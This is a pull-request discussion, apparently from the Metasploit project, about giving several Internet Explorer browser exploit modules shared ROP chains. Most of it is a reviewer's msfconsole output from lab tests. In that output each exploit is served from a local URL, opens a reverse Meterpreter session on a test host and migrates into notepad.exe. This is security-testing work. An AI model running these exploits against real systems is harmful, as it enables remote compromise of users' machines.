Ropdb for some existing browser exploits #862
Merged
I don't think it is related to this pull request, but msftidy complains about ie_execcommand_uaf.rb; we could use this pull request to fix it:

```
modules/exploits/windows/browser/ie_execcommand_uaf.rb ... bad indent: 1 274: "\t\t </script>\n"
```

Eyeballed and looks good. Tested successfully with some of them just to have proof of working:

ie_execcommand_uaf with JRE rop chain

```
msf > use exploit/windows/browser/ie_execcommand_uaf
msf exploit(ie_execcommand_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.128:4444
[*] Using URL: http://0.0.0.0:8080/c4WIgSDC19Y9
[*] Local IP: http://192.168.1.128:8080/c4WIgSDC19Y9
[*] Server started.
msf exploit(ie_execcommand_uaf) > [*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.128 ie_execcommand_uaf - Redirecting to kDYIV.html
[*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.128 ie_execcommand_uaf - Loading kDYIV.html
[*] 192.168.1.128 ie_execcommand_uaf - Using JRE ROP
[*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.128 ie_execcommand_uaf - Loading JzNMrq.html
[*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.128 ie_execcommand_uaf - Loading JzNMrq.html
[*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] Sending stage (752128 bytes) to 192.168.1.128
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.128:55845) at 2012-10-05 21:39:49 +0200
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.128:55845) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2744)
[*] Spawning notepad.exe process to migrate to
msf exploit(ie_execcommand_uaf) > [+] Migrating to 3404
msf exploit(ie_execcommand_uaf) > [+] Successfully migrated to process
[*] 192.168.172.143 - Meterpreter session 1 closed.  Reason: Died
```

ie_execcommand_uaf with msvcrt rop chain

```
msf exploit(ie_execcommand_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.128:4444
[*] Using URL: http://0.0.0.0:8080/bIgfChSJXv
[*] Local IP: http://192.168.1.128:8080/bIgfChSJXv
[*] Server started.
msf exploit(ie_execcommand_uaf) > [*] 192.168.1.152 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.152 ie_execcommand_uaf - Redirecting to anKOa.html
[*] 192.168.1.152 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.152 ie_execcommand_uaf - Loading anKOa.html
[*] 192.168.1.152 ie_execcommand_uaf - Using msvcrt ROP
[*] 192.168.1.152 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.152 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.152 ie_execcommand_uaf - Loading bORWJq.html
[*] 192.168.1.152 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
[*] Sending stage (752128 bytes) to 192.168.1.152
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.152:1782) at 2012-10-05 21:43:30 +0200
[*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.152:1782) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1624)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3568
[+] Successfully migrated to process
```

ms12_037_same_id with msvcrt rop chain

```
msf exploit(ms12_037_same_id) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.128:4444
[*] Using URL: http://0.0.0.0:8080/UTGFuxxagAU
[*] Local IP: http://192.168.1.128:8080/UTGFuxxagAU
[*] Server started.
msf exploit(ms12_037_same_id) > [*] 192.168.1.152 ms12_037_same_id - Client requesting: /UTGFuxxagAU
[*] 192.168.1.152 ms12_037_same_id - Using msvcrt ROP
[*] 192.168.1.152 ms12_037_same_id - Sending html
[*] Sending stage (752128 bytes) to 192.168.1.152
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.152:1853) at 2012-10-05 21:47:11 +0200
[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.152:1853) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1600)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3560
[+] Successfully migrated to process
```

msxml_get_definition_code_exec with msvcrt rop chain

```
msf exploit(msxml_get_definition_code_exec) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[-] Handler failed to bind to 192.168.1.128:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:8080/Xwngfl7B7UgEKO2
[*] Local IP: http://192.168.1.128:8080/Xwngfl7B7UgEKO2
[*] Server started.
msf exploit(msxml_get_definition_code_exec) > [*] 192.168.1.152 msxml_get_definition_code_exec - Using msvcrt ROP
[*] 192.168.1.152 msxml_get_definition_code_exec - 192.168.1.152:1863 - Sending html
[*] Sending stage (752128 bytes) to 192.168.1.152
[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.152:1864) at 2012-10-05 21:48:41 +0200
[*] Session ID 4 (192.168.1.128:4444 -> 192.168.1.152:1864) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3680)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2644
[+] Successfully migrated to process
```
Testing looks good, I'll just merge this. Thanks.
Use RopDb for some existing recent browser exploits.